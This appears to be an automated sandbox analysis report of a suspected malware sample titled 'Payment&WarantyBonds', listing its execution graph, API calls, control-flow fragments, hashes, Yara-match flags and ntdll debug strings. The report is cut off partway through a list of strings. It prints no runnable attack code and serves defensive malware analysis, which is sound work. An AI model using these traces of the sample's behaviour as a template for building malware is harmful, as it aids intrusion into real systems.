                                                                                                                                                                                execution_graph 93841 42f5c3 93842 42f5d3 93841->93842 93843 42f5d9 93841->93843 93846 42e603 93843->93846 93845 42f5ff 93849 42c7b3 93846->93849 93848 42e61e 93848->93845 93850 42c7d0 93849->93850 93851 42c7e1 RtlAllocateHeap 93850->93851 93851->93848 93866 424853 93867 42486f 93866->93867 93868 424897 93867->93868 93869 4248ab 93867->93869 93871 42c483 NtClose 93868->93871 93870 42c483 NtClose 93869->93870 93872 4248b4 93870->93872 93873 4248a0 93871->93873 93876 42e643 RtlAllocateHeap 93872->93876 93875 4248bf 93876->93875 93877 42ba93 93878 42bab0 93877->93878 93881 1842df0 LdrInitializeThunk 93878->93881 93879 42bad8 93881->93879 93976 424bf3 93981 424c0c 93976->93981 93977 424c99 93978 424c54 93979 42e523 RtlFreeHeap 93978->93979 93980 424c61 93979->93980 93981->93977 93981->93978 93982 424c94 93981->93982 93983 42e523 RtlFreeHeap 93982->93983 93983->93977 93984 42f6f3 93985 42f663 93984->93985 93986 42e603 RtlAllocateHeap 93985->93986 93989 42f6c0 93985->93989 93987 42f69d 93986->93987 93988 42e523 RtlFreeHeap 93987->93988 93988->93989 93852 413983 93855 42c713 93852->93855 93856 42c72d 93855->93856 93859 1842c70 LdrInitializeThunk 93856->93859 93857 4139a5 93859->93857 93882 41b153 93883 41b197 93882->93883 93884 41b1b8 93883->93884 93885 42c483 NtClose 93883->93885 93885->93884 93990 413ef3 93991 413ef6 93990->93991 93996 417643 93991->93996 93993 413f2a 93994 413f76 93993->93994 93995 413f63 PostThreadMessageW 93993->93995 93995->93994 93997 417667 93996->93997 93998 4176a3 LdrLoadDll 93997->93998 93999 41766e 93997->93999 93998->93999 93999->93993 93975 1842b60 LdrInitializeThunk 93860 418c08 93863 42c483 93860->93863 93862 418c12 93864 42c4a0 93863->93864 93865 42c4b1 NtClose 93864->93865 93865->93862 93886 4019d9 93887 4019e0 93886->93887 93890 42fa93 93887->93890 93893 42e0d3 93890->93893 93894 42e0f9 93893->93894 93905 407283 93894->93905 93896 42e10f 93904 401abc 93896->93904 93908 41af63 93896->93908 93898 42e12e 93899 42e143 93898->93899 93923 42c853 93898->93923 93919 428163 93899->93919 93902 42e15d 93903 42c853 ExitProcess 93902->93903 93903->93904 93907 407290 93905->93907 93926 416363 93905->93926 93907->93896 93909 41af8f 93908->93909 93950 41ae53 93909->93950 93912 41afd4 93914 41aff0 93912->93914 93917 42c483 NtClose 93912->93917 93913 41afbc 93915 41afc7 93913->93915 93916 42c483 NtClose 93913->93916 93914->93898 93915->93898 93916->93915 93918 41afe6 93917->93918 93918->93898 93920 4281c5 93919->93920 93922 4281d2 93920->93922 93961 4184b3 93920->93961 93922->93902 93924 42c870 93923->93924 93925 42c881 ExitProcess 93924->93925 93925->93899 93927 416380 93926->93927 93929 416399 93927->93929 93930 42cee3 93927->93930 93929->93907 93932 42cefd 93930->93932 93931 42cf2c 93931->93929 93932->93931 93937 42bae3 93932->93937 93938 42bb00 93937->93938 93944 1842c0a 93938->93944 93939 42bb2c 93941 42e523 93939->93941 93947 42c803 93941->93947 93943 42cfa2 93943->93929 93945 1842c11 93944->93945 93946 1842c1f LdrInitializeThunk 93944->93946 93945->93939 93946->93939 93948 42c81d 93947->93948 93949 42c82e RtlFreeHeap 93948->93949 93949->93943 93951 41af49 93950->93951 93952 41ae6d 93950->93952 93951->93912 93951->93913 93956 42bb83 93952->93956 93955 42c483 NtClose 93955->93951 93957 42bb9d 93956->93957 93960 18435c0 LdrInitializeThunk 93957->93960 93958 41af3d 93958->93955 93960->93958 93963 4184dd 93961->93963 93962 4189eb 93962->93922 93963->93962 93969 413b63 93963->93969 93965 41860a 93965->93962 93966 42e523 RtlFreeHeap 93965->93966 93967 418622 93966->93967 93967->93962 93968 42c853 ExitProcess 93967->93968 93968->93962 93973 413b83 93969->93973 93971 413bec 93971->93965 93972 413be2 93972->93965 93973->93971 93974 41b273 RtlFreeHeap LdrInitializeThunk 93973->93974 93974->93972

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 00417643 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 176 417643-41766c call 42f103 179 417672-417680 call 42f703 176->179 180 41766e-417671 176->180 183 417690-4176a1 call 42dba3 179->183 184 417682-41768d call 42f9a3 179->184 189 4176a3-4176b7 LdrLoadDll 183->189 190 4176ba-4176bd 183->190 184->183 189->190
                                                                                                                                                                                APIs
                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176B5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                • Opcode ID: 2acb059c442e8cdeca4d48adca3ecf7414906d67dbbe2b9188f97ec82255bcc6
                                                                                                                                                                                • Instruction ID: 87064ee05c68f4dd1de749d9eca8b4b2b264888e6efa99d8a4d6e083abd2e19a
                                                                                                                                                                                • Opcode Fuzzy Hash: 2acb059c442e8cdeca4d48adca3ecf7414906d67dbbe2b9188f97ec82255bcc6
                                                                                                                                                                                • Instruction Fuzzy Hash: B6015EB1E0420DABDB10EBE5DC42FDEB3789B54308F4041AAED0897241F635EB588B95
                                                                                                                                                                                Function 0042C483 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 201 42c483-42c4bf call 404653 call 42d6c3 NtClose
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C4BA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                • Opcode ID: 92e54b4cd05bfc7cbc6d71ba954d9647256663cf06b5149f3237a1ae9698a208
                                                                                                                                                                                • Instruction ID: 5f458c6e9710c6fad3c7f30fce12baaa212b728e4b5dd2a8e1051120f2197376
                                                                                                                                                                                • Opcode Fuzzy Hash: 92e54b4cd05bfc7cbc6d71ba954d9647256663cf06b5149f3237a1ae9698a208
                                                                                                                                                                                • Instruction Fuzzy Hash: FEE04F366402147BC660AB5AEC01F9B775CDFC5754F40441AFA1C67241CA75790187A9
                                                                                                                                                                                Function 01842B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 215 1842b60-1842b6c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: b0b8f7233550a816782e492171b6ab3682f98508527dad5c61f4e736bfa5af8f
                                                                                                                                                                                • Instruction ID: 708da6853d7115dd6ae460148a3fd5828274f3b1612557eb572eb884a2dded46
                                                                                                                                                                                • Opcode Fuzzy Hash: b0b8f7233550a816782e492171b6ab3682f98508527dad5c61f4e736bfa5af8f
                                                                                                                                                                                • Instruction Fuzzy Hash: 1990026120240007424671594414616440AD7E1301B55C022F6018590DC5258A956626
                                                                                                                                                                                Function 01842DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 217 1842df0-1842dfc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: b4babc0dda2c32d0690a01d11e195e946cbb70180919b812413d3967ef09ca47
                                                                                                                                                                                • Instruction ID: 8b2a465b3071ceb2ca8f11c589425ca2738e131e162cb431cd8e2105e6e03cb1
                                                                                                                                                                                • Opcode Fuzzy Hash: b4babc0dda2c32d0690a01d11e195e946cbb70180919b812413d3967ef09ca47
                                                                                                                                                                                • Instruction Fuzzy Hash: FF90023120140417D252715945047070409D7D1341F95C413B5428558DD6568B56A622
                                                                                                                                                                                Function 01842C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 216 1842c70-1842c7c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 4ab85d995be18ed019a04890b2293aed6f0776c443f044f717fdd0ab4aa2b9ea
                                                                                                                                                                                • Instruction ID: 81c19f638b1a6f09e02ea30b66326b995be5007b2a54d46542b911e8a6f9f34d
                                                                                                                                                                                • Opcode Fuzzy Hash: 4ab85d995be18ed019a04890b2293aed6f0776c443f044f717fdd0ab4aa2b9ea
                                                                                                                                                                                • Instruction Fuzzy Hash: 6090023120148806D2517159840474A0405D7D1301F59C412B9428658DC6958A957622
                                                                                                                                                                                Function 018435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 218 18435c0-18435cc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 424219e912077ed206fbb0fdb1a21be53436261c013fb698d379eabe1c341fcc
                                                                                                                                                                                • Instruction ID: 117b82ad7d38cf1d61cb8c5dbec7175b0790706f6d6352d20b33bb99b9478477
                                                                                                                                                                                • Opcode Fuzzy Hash: 424219e912077ed206fbb0fdb1a21be53436261c013fb698d379eabe1c341fcc
                                                                                                                                                                                • Instruction Fuzzy Hash: DC90023160550406D241715945147061405D7D1301F65C412B5428568DC7958B556AA3
                                                                                                                                                                                Function 00413EE7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • PostThreadMessageW.USER32(4648H9mUM,00000111,00000000,00000000), ref: 00413F70
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                • String ID: 4648H9mUM$4648H9mUM
                                                                                                                                                                                • API String ID: 1836367815-3945090275
                                                                                                                                                                                • Opcode ID: fc863437f2a222eecc99e27a68920c10b8d12d91f8d3db2e4b01f62c0419dcbb
                                                                                                                                                                                • Instruction ID: bc975eb8726c69bafb209bc3abc5e2bb845464fdbd23420247ef6b23241c2fb3
                                                                                                                                                                                • Opcode Fuzzy Hash: fc863437f2a222eecc99e27a68920c10b8d12d91f8d3db2e4b01f62c0419dcbb
                                                                                                                                                                                • Instruction Fuzzy Hash: 8211E771E412587AEB10DA91CC02FDFBB789F81B14F10415AFA007B280D67857068795
                                                                                                                                                                                Function 00413EA5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 14 413ea5-413f03 16 413f0c-413f61 call 42efd3 call 417643 call 4045c3 call 424d13 14->16 17 413f07 call 42e5c3 14->17 26 413f83-413f88 16->26 27 413f63-413f74 PostThreadMessageW 16->27 17->16 27->26 28 413f76-413f80 27->28 28->26
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostThreadMessageW.USER32(4648H9mUM,00000111,00000000,00000000), ref: 00413F70
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                • String ID: 4648H9mUM$4648H9mUM
                                                                                                                                                                                • API String ID: 1836367815-3945090275
                                                                                                                                                                                • Opcode ID: af4ebe8acc006ffe43571c7bda9ccbed571883a4accc997bb5bfd0f9ce61daf3
                                                                                                                                                                                • Instruction ID: 351767833ddedfa17d599af5ce28c90b69b4e73ae4ca805aaa10b4a4daff1e13
                                                                                                                                                                                • Opcode Fuzzy Hash: af4ebe8acc006ffe43571c7bda9ccbed571883a4accc997bb5bfd0f9ce61daf3
                                                                                                                                                                                • Instruction Fuzzy Hash: 3011E771E44258BBDB219AA18C02FDFBB788F41714F14415AFA047B280D7B8970687EA
                                                                                                                                                                                Function 00413EF3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 29 413ef3-413f03 31 413f0c-413f61 call 42efd3 call 417643 call 4045c3 call 424d13 29->31 32 413f07 call 42e5c3 29->32 41 413f83-413f88 31->41 42 413f63-413f74 PostThreadMessageW 31->42 32->31 42->41 43 413f76-413f80 42->43 43->41
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostThreadMessageW.USER32(4648H9mUM,00000111,00000000,00000000), ref: 00413F70
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                • String ID: 4648H9mUM$4648H9mUM
                                                                                                                                                                                • API String ID: 1836367815-3945090275
                                                                                                                                                                                • Opcode ID: 24872ade7dce1fd0697dc9a9e5a2d2560ba7c9996ae1e9089a1c1d970fb4794b
                                                                                                                                                                                • Instruction ID: af8418bac4e5e62b63a11df15cf6155001274432c4d1df8b90f4fa99ff691cbc
                                                                                                                                                                                • Opcode Fuzzy Hash: 24872ade7dce1fd0697dc9a9e5a2d2560ba7c9996ae1e9089a1c1d970fb4794b
                                                                                                                                                                                • Instruction Fuzzy Hash: E401D671E4025876EB219A91CC02FDFBB7C8F41B14F04805AFA047B2C0E6BC570687EA
                                                                                                                                                                                Function 0042C803 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 196 42c803-42c844 call 404653 call 42d6c3 RtlFreeHeap
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5057E845,00000007,00000000,00000004,00000000,00416F27,000000F4), ref: 0042C83F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                • Opcode ID: c715db85d53a13bf2703d1e84f2e01fd539ab5599b816f7cf02fb243ce824c2a
                                                                                                                                                                                • Instruction ID: 1f1b2a02fd313679521514eb47efc6442fe8b54bb3e9c2829bcf38eb00dc1064
                                                                                                                                                                                • Opcode Fuzzy Hash: c715db85d53a13bf2703d1e84f2e01fd539ab5599b816f7cf02fb243ce824c2a
                                                                                                                                                                                • Instruction Fuzzy Hash: 4AE065B66002047BC614EE59EC42EDB73ADEFCA714F00441AFA18A7241DA75B9108BB9
                                                                                                                                                                                Function 0042C7B3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 191 42c7b3-42c7f7 call 404653 call 42d6c3 RtlAllocateHeap
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,0041E40B,?,?,00000000,?,0041E40B,?,?,?), ref: 0042C7F2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                • Opcode ID: 28b77bc20edb0a168c07d26e1778ebc3a076a00a9a0fa9a8c42f3da64252722e
                                                                                                                                                                                • Instruction ID: fae582eca77becafcc92349202efceb97f256e514cb84dd1cbd0d04417ea3fd8
                                                                                                                                                                                • Opcode Fuzzy Hash: 28b77bc20edb0a168c07d26e1778ebc3a076a00a9a0fa9a8c42f3da64252722e
                                                                                                                                                                                • Instruction Fuzzy Hash: 6CE06D722002147FD610EF99EC41E9B33ACEFCA710F00441AFA08A7241DA74B9108BB9
                                                                                                                                                                                Function 0042C853 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 206 42c853-42c88f call 404653 call 42d6c3 ExitProcess
                                                                                                                                                                                APIs
                                                                                                                                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,B5727CFB,?,?,B5727CFB), ref: 0042C88A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                • Opcode ID: 64d2dd0f805d5c374ef794ce1e7e794fe0ea545bc6e9901331b0f9e010597a2a
                                                                                                                                                                                • Instruction ID: bc802583a2c2c609f8f687f00da689e9d4c98de31bfd4ded7f3633e7ceebd465
                                                                                                                                                                                • Opcode Fuzzy Hash: 64d2dd0f805d5c374ef794ce1e7e794fe0ea545bc6e9901331b0f9e010597a2a
                                                                                                                                                                                • Instruction Fuzzy Hash: 11E04F316002147BD110BB6ADC05FDB776CDFC6714F00441AFE5867242CA75790087B5
                                                                                                                                                                                Function 01842C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 211 1842c0a-1842c0f 212 1842c11-1842c18 211->212 213 1842c1f-1842c26 LdrInitializeThunk 211->213
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 510223f9b684263e23cff47cb3a62f0273c34362a4d0a0e50aaf7bc620a89aec
                                                                                                                                                                                • Instruction ID: f63c336f628adabc7766a7891f16d9a29cf4172be41f5933b5ba880c2356e11a
                                                                                                                                                                                • Opcode Fuzzy Hash: 510223f9b684263e23cff47cb3a62f0273c34362a4d0a0e50aaf7bc620a89aec
                                                                                                                                                                                • Instruction Fuzzy Hash: FAB09B719055C5CADB52E76456087177D01B7D1701F15C062F3034641F4778C2D5E676

                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                Function 01882349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-2160512332
                                                                                                                                                                                • Opcode ID: 18e644847a58b5706c89d0af11a18b2afdd5ac5e8aaa6f3194466662fc16a83c
                                                                                                                                                                                • Instruction ID: 3a9b0cc0427d0df2a14293f6f5d242b8b8a7194cd92d474c90adc91f8f135f08
                                                                                                                                                                                • Opcode Fuzzy Hash: 18e644847a58b5706c89d0af11a18b2afdd5ac5e8aaa6f3194466662fc16a83c
                                                                                                                                                                                • Instruction Fuzzy Hash: 7E929E71608746AFE721EE18C880F6BBBEABF84714F04491DFA94D7251D770EA44CB92
                                                                                                                                                                                Function 01838620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • Thread identifier, xrefs: 0187553A
                                                                                                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018754E2
                                                                                                                                                                                • corrupted critical section, xrefs: 018754C2
                                                                                                                                                                                • Address of the debug info found in the active list., xrefs: 018754AE, 018754FA
                                                                                                                                                                                • Critical section address, xrefs: 01875425, 018754BC, 01875534
                                                                                                                                                                                • Invalid debug info address of this critical section, xrefs: 018754B6
                                                                                                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01875543
                                                                                                                                                                                • double initialized or corrupted critical section, xrefs: 01875508
                                                                                                                                                                                • Critical section address., xrefs: 01875502
                                                                                                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018754CE
                                                                                                                                                                                • undeleted critical section in freed memory, xrefs: 0187542B
                                                                                                                                                                                • 8, xrefs: 018752E3
                                                                                                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0187540A, 01875496, 01875519
                                                                                                                                                                                • Critical section debug info address, xrefs: 0187541F, 0187552E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                • API String ID: 0-2368682639
                                                                                                                                                                                • Opcode ID: 15d2795863d36c00180f773a96c4fa5aad9387f44a49c1add55e36465a96a638
                                                                                                                                                                                • Instruction ID: 2a64b600bfecb6cb10e453c75b3711a886c9e7cfd89062f14c4d945452d5e545
                                                                                                                                                                                • Opcode Fuzzy Hash: 15d2795863d36c00180f773a96c4fa5aad9387f44a49c1add55e36465a96a638
                                                                                                                                                                                • Instruction Fuzzy Hash: D5818AB1A00358AFDB20CF99C888BAEBBF5FB49704F244119F504F7290D775AA40CBA1
                                                                                                                                                                                Function 018329F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0187261F
                                                                                                                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01872602
                                                                                                                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018722E4
                                                                                                                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01872498
                                                                                                                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018725EB
                                                                                                                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018724C0
                                                                                                                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01872506
                                                                                                                                                                                • @, xrefs: 0187259B
